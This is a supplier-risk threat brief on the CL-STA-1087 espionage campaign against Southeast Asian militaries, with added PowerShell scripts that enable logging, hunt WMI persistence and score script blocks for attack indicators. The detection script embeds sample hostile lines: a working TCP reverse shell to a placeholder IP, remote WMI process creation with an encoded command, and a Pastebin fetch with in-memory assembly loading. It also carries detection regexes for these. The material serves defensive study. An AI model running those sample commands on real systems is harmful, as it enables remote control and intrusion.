China‑Linked APT CL‑STA‑1087 Conducts Long‑Term Espionage Against Southeast Asian Militaries Using AppleChris and MemFun Malware
What Happened — A China‑affiliated advanced‑persistent‑threat group, tracked as CL‑STA‑1087, has been infiltrating the defence ministries and militaries of several Southeast Asian countries since at least 2020. The actors deployed two custom backdoors, AppleChris and MemFun, and relied on PowerShell, WMI, DLL hijacking and in‑memory execution to stay resident for years while exfiltrating command, control, communications, computers and intelligence (C4I) data and organisational‑structure information.
Why It Matters for TPRM —
- Espionage campaigns routinely enter through suppliers and service providers that hold trusted access, so a compromised partner becomes a quiet path into the organisations it serves.
- An intrusion that has been resident since 2020 will not be surfaced by a point‑in‑time vendor questionnaire; long‑dwell access tends to survive on unmanaged or unmonitored endpoints that such assessments never examine.
- Stolen military‑capability data can be turned against allied suppliers and contractors, raising geopolitical risk for any firm with defence‑related contracts in the region.
Who Is Affected — Government & defence (military ministries, C4I system providers, defence contractors).
Recommended Actions —
- Identify suppliers and subcontractors that hold Southeast Asian defence contracts or connect to those networks, and ask them to confirm they have hunted for the tactics described in the technical notes below.
- Verify that all endpoints, especially unmanaged workstations and jump hosts used by contractors, are covered by continuous EDR monitoring and by PowerShell script block, module and transcription logging forwarded off‑host to a SIEM.
- Constrain PowerShell with application control (WDAC or AppLocker), which also enforces Constrained Language Mode, rather than relying on the execution policy, which is a safety feature and not a security boundary; restrict remote WMI/DCOM where it is not needed and alert on newly created WMI event subscriptions; make application‑control rules cover DLLs as well as executables so a hijacked search path cannot load an unsigned library.
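The logging and WMI checks above, as an added example written for this brief; it is not code from the SecurityAffairs write‑up or from the CL‑STA‑1087 reporting. It sets the PowerShell logging policy values under HKLM, then enumerates WMI event‑subscription bindings that end in a code‑executing consumer. The transcript directory C:\PSTranscripts and the assumption that no domain GPO overrides these local values are illustrative.

```powershell
# Added example (not code from the SecurityAffairs write-up or the CL-STA-1087 reporting).
# Enables the PowerShell logging the recommendations rely on, then hunts the local host
# for WMI event-subscription persistence. Run in an elevated PowerShell 5.1+ session.
# Assumptions: no domain GPO overrides these HKLM policy values, and C:\PSTranscripts
# is an ACL-restricted directory that is forwarded to the SIEM (both are illustrative).

$PolicyBase = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param(
        [Parameter(Mandatory)][string]$SubKey,
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)]$Value,
        [string]$Type = 'DWord'
    )
    $path = Join-Path $PolicyBase $SubKey
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    New-ItemProperty -Path $path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 1. Script block logging (event 4104, Microsoft-Windows-PowerShell/Operational) records the
#    de-obfuscated text of every script block, including code passed through IEX or
#    -EncodedCommand, which is how PowerShell reverse-shell one-liners are usually launched.
Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1

# 2. Module logging for every module (event 4103) captures pipeline details such as the
#    arguments handed to Invoke-WmiMethod / Invoke-CimMethod.
Set-PolicyValue -SubKey 'ModuleLogging' -Name 'EnableModuleLogging' -Value 1
Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'

# 3. Transcription writes full session input/output to disk; the directory should be
#    write-only for users and shipped off-host, or an intruder simply deletes it.
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value 'C:\PSTranscripts' -Type 'String'

# 4. WMI persistence hunt. A __FilterToConsumerBinding ties an __EventFilter (WQL trigger)
#    to a consumer; when that consumer is a CommandLineEventConsumer or an
#    ActiveScriptEventConsumer, arbitrary code runs whenever the trigger fires.
#    Windows ships one binding (SCM Event Log Filter) whose consumer is an
#    NTEventLogEventConsumer, so it is not returned here.
function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) +
                 @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)

    foreach ($b in $bindings) {
        # Filter/Consumer are object references; stringify so the match works whether the
        # reference renders as __EventFilter.Name="x" (WMI) or __EventFilter (Name = "x") (CIM).
        $fRef = "$($b.Filter)"
        $cRef = "$($b.Consumer)"
        $f = $filters   | Where-Object { $fRef -match ('Name\s*=\s*"' + [regex]::Escape($_.Name) + '"') }
        $c = $consumers | Where-Object { $cRef -match ('Name\s*=\s*"' + [regex]::Escape($_.Name) + '"') }
        if (-not $c) { continue }   # consumer is not a code-execution class

        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        [pscustomobject]@{
            FilterName   = $f.Name
            Query        = $f.Query
            ConsumerName = $c.Name
            Payload      = $payload
        }
    }
}

Get-WmiPersistence | Format-List
```

Any object returned by Get-WmiPersistence on a workstation or server that has not been deliberately instrumented deserves an incident ticket: the WQL in Query tells you the trigger (commonly a timer or a process‑start event) and Payload is the command or script that runs each time it fires. Because the policy values are written under HKLM\SOFTWARE\Policies, a domain GPO that sets the same keys will silently win; confirm the effective values with Get-ItemProperty on a sample host after the next policy refresh.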
Technical Notes — The attackers used PowerShell scripts to spawn reverse shells, propagated AppleChris to other hosts with WMI and .NET commands, and loaded MemFun through DLL hijacking, process hollowing and reflective loading so that the backdoor rarely touches disk as a recognisable executable. Both backdoors locate their command‑and‑control servers through encrypted Pastebin "dead‑drop resolvers", meaning the implant fetches its current C2 address from a paste rather than embedding it, and then talk to C2 over HTTP using custom request methods, with Blowfish encryption applied to delivered payloads. Because the payload itself is encrypted, network detection should key on the paste‑site fetches from non‑browser processes and on the non‑standard HTTP methods rather than on content inspection. Source: SecurityAffairs
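Detection logic for the host‑side behaviours in these notes, as an added example written for this brief; it is not code from the SecurityAffairs write‑up or from the CL‑STA‑1087 reporting. It scores PowerShell script‑block text against indicators for TCP reverse shells, WMI process creation on remote hosts, reflective assembly loading, download cradles and Pastebin raw‑paste fetches. The sample script blocks, the host name FILESRV01, the IP 203.0.113.10, the paste ID and the base64 string are all constructed placeholders; the live function reads event 4104 from the local Operational log when script block logging is enabled.

```powershell
# Added example (not code from the SecurityAffairs write-up or the CL-STA-1087 reporting).
# Scores PowerShell script-block text (event 4104) against indicators for the techniques
# described in the technical notes. The $Samples below are constructed for illustration.

$Indicators = @(
    @{ Name = 'ReverseShell-TcpClient';   Pattern = 'System\.Net\.Sockets\.TCPClient' }
    @{ Name = 'ReverseShell-Stream';      Pattern = '\$stream\.(Read|Write)|\.GetStream\(\)' }
    @{ Name = 'WmiProcessCreate';         Pattern = '(Invoke-WmiMethod|Invoke-CimMethod).*Win32_Process.*Create' }
    @{ Name = 'WmiRemoteComputer';        Pattern = 'Win32_Process.*-ComputerName' }
    @{ Name = 'ReflectiveAssemblyLoad';   Pattern = '\[(System\.)?Reflection\.Assembly\]::Load\(' }
    @{ Name = 'DownloadCradle';           Pattern = 'DownloadString\(|Invoke-WebRequest|\biwr\b|Net\.WebClient' }
    @{ Name = 'PasteSiteDeadDrop';        Pattern = 'pastebin\.com/raw/' }
    @{ Name = 'InvokeExpression';         Pattern = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'EncodedCommand';           Pattern = '-[Ee]nc(odedCommand)?\s+[A-Za-z0-9+/=]{40,}' }
)

function Test-ScriptBlock {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Text)
    # -match is case-insensitive by default, which suits PowerShell's case-insensitive syntax.
    $hits = foreach ($i in $Indicators) {
        if ($Text -match $i.Pattern) { $i.Name }
    }
    [pscustomobject]@{
        Score      = @($hits).Count
        Indicators = @($hits)
        Snippet    = $Text.Substring(0, [Math]::Min(80, $Text.Length))
    }
}

# Constructed sample script blocks (not real telemetry).
$Samples = @(
    # Classic one-line TCP reverse shell
    '$client = New-Object System.Net.Sockets.TCPClient("203.0.113.10",443); $stream = $client.GetStream(); while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){ $data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i); IEX $data }'
    # Lateral movement: remote process creation over WMI with an encoded command (base64 is a placeholder)
    'Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName FILESRV01 -ArgumentList "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"'
    # Dead-drop resolver fetch followed by an in-memory assembly load
    '$u = (New-Object Net.WebClient).DownloadString("https://pastebin.com/raw/AbCdEf12"); [System.Reflection.Assembly]::Load([Convert]::FromBase64String($u))'
    # Benign administrative activity, for contrast
    'Get-Service -Name Spooler | Restart-Service'
)

# Score the constructed samples; only blocks with two or more indicators are shown.
$Samples | ForEach-Object { Test-ScriptBlock -Text $_ } |
    Where-Object Score -ge 2 |
    Format-Table Score, Indicators, Snippet -AutoSize

# Live hunt over the local host's 4104 events. Script block logging must be enabled;
# blocks larger than 32 KB are logged in several chunks, so a single chunk may hold only
# part of a pattern and a low score on one chunk does not clear the whole script.
function Get-SuspiciousScriptBlocks {
    param([int]$MinScore = 2, [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # For event 4104, Properties[2] is ScriptBlockText and Properties[4] is the script path, if any.
            $r = Test-ScriptBlock -Text ([string]$_.Properties[2].Value)
            if ($r.Score -ge $MinScore) {
                $r | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
            }
        }
}
```

Run the top of the script to see the three constructed malicious samples surface with a score of three each while the Restart-Service block scores zero; then call Get-SuspiciousScriptBlocks on an instrumented host to apply the same scoring to real 4104 events. The two‑indicator threshold is deliberate: a lone Invoke-WebRequest or IEX is common in legitimate administration, whereas a network socket plus IEX, or a paste‑site fetch plus an in‑memory assembly load, is the combination the notes describe. The indicator list is a starting point to tune against your own baseline, not a complete signature for either backdoor.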